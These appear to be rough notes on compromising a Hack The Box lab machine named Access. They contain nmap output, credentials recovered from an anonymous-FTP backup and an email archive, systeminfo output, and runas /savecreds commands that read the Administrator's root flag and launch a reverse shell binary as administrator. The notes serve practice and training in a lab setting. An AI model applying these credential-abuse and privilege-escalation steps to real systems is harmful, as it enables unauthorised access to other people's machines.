NMAP================
db_nmap -A -p- -T4 10.10.10.98 -v
[] Nmap: Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-11 19:39 CDT
[] Nmap: NSE: Loaded 156 scripts for scanning.
[] Nmap: NSE: Script Pre-scanning.
[] Nmap: Initiating NSE at 19:39
[] Nmap: Completed NSE at 19:39, 0.00s elapsed
[] Nmap: Initiating NSE at 19:39
[] Nmap: Completed NSE at 19:39, 0.00s elapsed
[] Nmap: Initiating NSE at 19:39
[] Nmap: Completed NSE at 19:39, 0.00s elapsed
[] Nmap: Initiating Ping Scan at 19:39
[] Nmap: Scanning 10.10.10.98 [2 ports]
[] Nmap: Completed Ping Scan at 19:39, 0.05s elapsed (1 total hosts)
[] Nmap: Initiating Parallel DNS resolution of 1 host. at 19:39
[] Nmap: Completed Parallel DNS resolution of 1 host. at 19:39, 0.03s elapsed
[] Nmap: Initiating Connect Scan at 19:39
[] Nmap: Scanning 10.10.10.98 [65535 ports]
[] Nmap: Discovered open port 21/tcp on 10.10.10.98
[] Nmap: Discovered open port 23/tcp on 10.10.10.98
[] Nmap: Discovered open port 80/tcp on 10.10.10.98
[] Nmap: Connect Scan Timing: About 22.62% done; ETC: 19:42 (0:01:46 remaining)
[] Nmap: Connect Scan Timing: About 58.39% done; ETC: 19:41 (0:00:43 remaining)
[] Nmap: Completed Connect Scan at 19:41, 88.85s elapsed (65535 total ports)
[] Nmap: Initiating Service scan at 19:41
[] Nmap: Scanning 3 services on 10.10.10.98
[] Nmap: Completed Service scan at 19:44, 162.62s elapsed (3 services on 1 host)
[] Nmap: NSE: Script scanning 10.10.10.98.
[] Nmap: Initiating NSE at 19:44
[] Nmap: NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
[] Nmap: Completed NSE at 19:44, 14.19s elapsed
[] Nmap: Initiating NSE at 19:44
[] Nmap: Completed NSE at 19:44, 1.10s elapsed
[] Nmap: Initiating NSE at 19:44
[] Nmap: Completed NSE at 19:44, 0.00s elapsed
[] Nmap: Nmap scan report for 10.10.10.98
[] Nmap: Host is up (0.048s latency).
[] Nmap: Not shown: 65532 filtered tcp ports (no-response)
[] Nmap: PORT   STATE SERVICE VERSION
[] Nmap: 21/tcp open  ftp     Microsoft ftpd
[] Nmap: | ftp-syst:
[] Nmap: |_  SYST: Windows_NT
[] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[] Nmap: |_Can't get directory listing: PASV failed: 425 Cannot open data connection.
[] Nmap: 23/tcp open  telnet?
[] Nmap: 80/tcp open  http    Microsoft IIS httpd 7.5
[] Nmap: |_http-server-header: Microsoft-IIS/7.5
[] Nmap: |http-title: MegaCorp
[] Nmap: | http-methods:
[] Nmap: |   Supported Methods: OPTIONS TRACE GET HEAD POST
[*] Nmap: |  Potentially risky methods: TRACE
[] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[] Nmap: NSE: Script Post-scanning.
[] Nmap: Initiating NSE at 19:44
[] Nmap: Completed NSE at 19:44, 0.00s elapsed
[] Nmap: Initiating NSE at 19:44
[] Nmap: Completed NSE at 19:44, 0.00s elapsed
[] Nmap: Initiating NSE at 19:44
[] Nmap: Completed NSE at 19:44, 0.00s elapsed
[] Nmap: Read data files from: /usr/bin/../share/nmap
[] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 267.16 seconds


FINDINGS====================
discovered credentials via backup file that we got from anonymous login over ftp

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/0df24f2c-b950-4070-8bbd-6b84f7b840f4/Untitled.png)

Used the Access4u@security to unlock the .zip file from anonymous ftp login. 

Got a .pst file andloaded that up and looked at the lone emial.

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/a7dc314f-d705-45a6-9cd1-3d77741fb4e9/Untitled.png)

security:4Cc3ssC0ntr0ller 

 

Host Name:                 ACCESS
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:

Product ID:                55041-507-9857321-84191
Original Install Date:     8/21/2018, 9:43:10 PM
System Boot Time:          9/12/2023, 1:36:35 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     6,143 MB
Available Physical Memory: 5,399 MB
Virtual Memory: Max Size:  12,285 MB
Virtual Memory: Available: 11,552 MB
Virtual Memory: In Use:    733 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 110 Hotfix(s) Installed.
[01]: KB981391
[02]: KB981392
[03]: KB977236
[04]: KB981111
[05]: KB977238
[06]: KB977239
[07]: KB981390
[08]: KB2032276
[09]: KB2296011
[10]: KB2305420
[11]: KB2345886
[12]: KB2347290
[13]: KB2378111
[14]: KB2386667
[15]: KB2387149
[16]: KB2393802
[17]: KB2419640
[18]: KB2423089
[19]: KB2425227
[20]: KB2442962
[21]: KB2454826
[22]: KB2467023
[23]: KB2479943
[24]: KB2483614
[25]: KB2484033
[26]: KB2488113
[27]: KB2505438
[28]: KB2506014
[29]: KB2506212
[30]: KB2506928
[31]: KB2509553
[32]: KB2511250
[33]: KB2511455
[34]: KB2522422
[35]: KB2529073
[36]: KB2535512
[37]: KB2544893
[38]: KB2545698
[39]: KB2547666
[40]: KB2552343
[41]: KB2560656
[42]: KB2563227
[43]: KB2564958
[44]: KB2570947
[45]: KB2585542
[46]: KB2598845
[47]: KB2603229
[48]: KB2604114
[49]: KB2607047
[50]: KB2608658
[51]: KB2618451
[52]: KB2620704
[53]: KB2621440
[54]: KB2631813
[55]: KB2640148
[56]: KB2643719
[57]: KB2653956
[58]: KB2654428
[59]: KB2656355
[60]: KB2660075
[61]: KB2667402
[62]: KB2676562
[63]: KB2685811
[64]: KB2685813
[65]: KB2685939
[66]: KB2690533
[67]: KB2698365
[68]: KB2705219
[69]: KB2709630
[70]: KB2712808
[71]: KB2716513
[72]: KB2718704
[73]: KB2719033
[74]: KB2726535
[75]: KB2727528
[76]: KB2729094
[77]: KB2729451
[78]: KB2741355
[79]: KB2742598
[80]: KB2748349
[81]: KB2758857
[82]: KB2761217
[83]: KB2765809
[84]: KB2770660
[85]: KB2789644
[86]: KB2791765
[87]: KB2807986
[88]: KB2813347
[89]: KB2840149
[90]: KB2998812
[91]: KB958488
[92]: KB972270
[93]: KB974431
[94]: KB974571
[95]: KB975467
[96]: KB975560
[97]: KB977074
[98]: KB978542
[99]: KB978601
[100]: KB979099
[101]: KB979309
[102]: KB979482
[103]: KB979538
[104]: KB979687
[105]: KB979688
[106]: KB980408
[107]: KB980846
[108]: KB982018
[109]: KB982132
[110]: KB982799
Network Card(s):           1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled:    Yes
DHCP Server:     255.255.255.255
IP address(es)
[01]: 10.10.10.98
[02]: fe80::8829:d62e:1ed8:1ae1
[03]: dead:beef::8829:d62e:1ed8:1ae1

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/63c7330c-a82f-40ff-9967-6083d7343381/Untitled.png)

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecreds C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\root.txt”

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecreds “C:\Windows\System32\cmd.exe /c TYPE C:\Users\security\revshell.exe”

C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecreds “C:\Windows\System32\cmd.exe /c COPY C:\Users\Administrator\Desktop\root.txt  C:\Temp\root.txt”

runas /user:access\administrator /savecreds "shell.exe”

C:\temp>runas /user:access\administrator /savecreds "revshell.exe”

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/945ba014-01dc-42d2-81fc-dc793af12137/Untitled.png)
CREDS ====

security:4Cc3ssC0ntr0ller 

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/40832a6e-5585-4104-87b8-e8f48be5b83a/Untitled.png)

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/0df24f2c-b950-4070-8bbd-6b84f7b840f4/Untitled.png)

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/a7dc314f-d705-45a6-9cd1-3d77741fb4e9/Untitled.png)

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/2ca5e9bd-d2e2-4944-9f24-14e28d3d20a9/Untitled.png)

![Untitled](https://prod-files-secure.s3.us-west-2.amazonaws.com/c50f3aa2-6e21-47ad-afe1-2003932d6cb6/b1841197-dd8a-4eef-a6ac-27b13be1507f/Untitled.png)
